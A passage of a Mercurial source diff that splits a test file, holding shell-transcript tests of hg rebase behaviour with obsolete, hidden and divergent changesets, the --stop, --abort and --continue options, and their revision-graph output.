rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [255] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. - - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - $ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - $ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . # working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . - 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > A - > EOS - 1 new orphan changesets - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. - - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. - $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF - - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [255] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [255] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== - $ cd .. - $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete2.t copy from tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete2.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete2.t @@ -18,732 +18,6 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . - rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. - -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. - - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B 